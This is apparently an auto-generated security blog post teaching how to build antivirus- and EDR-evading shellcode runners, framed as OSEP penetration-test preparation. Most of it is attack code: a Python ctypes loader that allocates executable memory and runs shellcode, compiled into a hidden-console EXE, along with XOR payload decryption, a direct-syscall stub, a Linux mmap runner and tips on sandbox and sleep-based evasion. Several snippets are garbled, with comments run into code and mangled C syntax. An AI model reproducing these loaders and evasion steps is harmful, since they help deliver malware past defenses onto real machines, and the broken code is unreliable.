Listen to this Post
Creating undetected shellcode runners is a critical skill for penetration testers, especially when preparing for advanced certifications like OSEP. These techniques help evade antivirus (AV) and endpoint detection and response (EDR) solutions, proving that security tools alone aren’t foolproof.
You Should Know:
1. Python Shellcode Runner & Compilation
A simple Python script can generate and compile shellcode into an undetected executable. Below is an example:
import ctypes import sys import os Replace with your shellcode (e.g., generated via msfvenom) shellcode = bytearray(b"\x90\x90\x90...") Allocate memory with execute permissions ptr = ctypes.windll.kernel32.VirtualAlloc( ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), MEM_COMMIT | MEM_RESERVE ctypes.c_int(0x40) PAGE_EXECUTE_READWRITE ) Copy shellcode into memory buf = (ctypes.c_char len(shellcode)).from_buffer(shellcode) ctypes.windll.kernel32.RtlMoveMemory( ctypes.c_int(ptr), buf, ctypes.c_int(len(shellcode)) ) Execute shellcode ht = ctypes.windll.kernel32.CreateThread( ctypes.c_int(0), ctypes.c_int(0), ctypes.c_int(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)) ) Wait for thread to finish ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1))
Compile it into an EXE using PyInstaller:
pyinstaller --onefile --noconsole shellcode_runner.py
2. Obfuscation Techniques
To evade static detection:
- Encrypt shellcode (AES, XOR) and decrypt at runtime.
- Code splitting – Break payload into chunks and reassemble in memory.
- API unhooking – Bypass EDR hooks by calling syscalls directly.
Example XOR decryption in C:
void XOR(char data, size_t data_len, char key, size_t key_len) {
for (int i = 0; i < data_len; i++) {
data[bash] ^= key[i % key_len];
}
}
3. Static & Dynamic Evasion Checks
- Static Analysis Evasion:
- Use UPX packing (though some EDRs flag it).
- Strip debug symbols (
stripcommand in Linux). - Dynamic Analysis Evasion:
- Check for sandbox artifacts (e.g., VM detection).
- Sleep-based evasion (
Sleep(60000)before execution).
4. Syscalls for Direct EDR Bypass
Instead of `VirtualAlloc`, use direct syscalls (Windows):
__declspec(naked) NTSTATUS NtAllocateVirtualMemory(
HANDLE ProcessHandle,
PVOID BaseAddress,
ULONG_PTR ZeroBits,
PSIZE_T RegionSize,
ULONG AllocationType,
ULONG Protect) {
__asm {
mov r10, rcx
mov eax, 0x18 // Syscall ID for NtAllocateVirtualMemory
syscall
ret
}
}
5. Linux Shellcode Execution
For Linux-based payloads:
include <sys/mman.h>
include <unistd.h>
int main() {
unsigned char shellcode[] = "\x90\x90\x90...";
void exec = mmap(0, sizeof(shellcode), PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
memcpy(exec, shellcode, sizeof(shellcode));
((void()())exec)();
return 0;
}
Compile with:
gcc -fno-stack-protector -z execstack shellcode_runner.c -o runner
What Undercode Say
Modern AV/EDR solutions are not infallible. A combination of obfuscation, direct syscalls, and dynamic execution can bypass most defenses. Purple teaming—where offensive techniques inform defensive improvements—is crucial for robust security.
Expected Output:
A functional, undetected shellcode runner that evades static and dynamic analysis while executing payloads in memory.
Relevant Resources:
References:
Reported By: Activity 7321663888918286336 – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
